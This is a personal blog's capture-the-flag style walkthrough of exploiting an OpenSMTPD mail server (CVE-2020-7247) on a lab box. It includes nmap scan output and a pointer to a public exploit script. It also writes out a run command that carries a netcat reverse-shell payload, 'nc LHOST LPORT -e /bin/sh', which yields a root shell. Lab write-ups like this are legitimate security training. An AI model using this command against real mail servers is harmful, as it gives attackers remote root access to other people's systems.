root💀bl4ck4non-sec:~#

Hack. Eat. Sleep. Repeat!!!

View on GitHub

Box: CVE-2020-7247

Level: Intermediate

OS: Linux

Lets get started

Recon

Portscanning

command:sudo nmap -A 10.0.100.33 -T4 -v -p-

Nmap scan report for 10.0.100.33
Host is up (0.14s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
25/tcp open  smtp    OpenSMTPD
| smtp-commands: CVE-2020-7247.echocity-f.com Hello nmap.scanme.org [10.10.6.230], pleased to meet you, 8BITMIME, ENHANCEDSTATUSCODES, SIZE 36700160, DSN, HELP
|_ 2.0.0 This is OpenSMTPD 2.0.0 To report bugs in the implementation, please contact bugs@openbsd.org 2.0.0 with full details 2.0.0 End of HELP info
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=9/28%OT=25%CT=1%CU=33018%PV=Y%DS=1%DC=T%G=Y%TM=6515713
OS:2%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=110%TI=Z%CI=RI%II=I%TS=A)OP
OS:S(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST
OS:11NW7%O6=M54DST11)WIN(W1=FB34%W2=FB34%W3=FB34%W4=FB34%W5=FB34%W6=FB34)EC
OS:N(R=Y%DF=N%T=40%W=FD5C%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=N%T=40%S=O%A=S+%F=
OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=41%W=0%S=A%A=S%F=AR%O=%RD=0%Q=)T5
OS:(R=Y%DF=N%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=41%W=0%S=A%A=S
OS:%F=AR%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK
OS:=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Uptime guess: 10.681 days (since Sun Sep 17 21:06:12 2023)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=256 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: CVE-2020-7247.echocity-f.com

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   155.49 ms 10.0.100.33

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Sep 28 13:27:30 2023 -- 1 IP address (1 host up) scanned in 774.88 seconds

From our nmap scan we can see only 1 open port. Our enumeration today will be focused on that port

Enumeration

The smtp server is running OpenSMPTD

Searching for available exploits

image

I found that, you can get the exploit here

Now that we’ve found the exploit, lets exploit this

Exploitation

Lets run the exploit

command:python3 47984.py 10.0.100.33 25 'nc LHOST LPORT -e /bin/sh'

Ensure you set your LHOST and LPORT

Also, before running, lets set our netcat listener

image

Good.

Running the exploit

image

We got a shell as the root user. This was quite easy

Well, this means we have successfully pwned this box😎

That will be all for today

Back To Home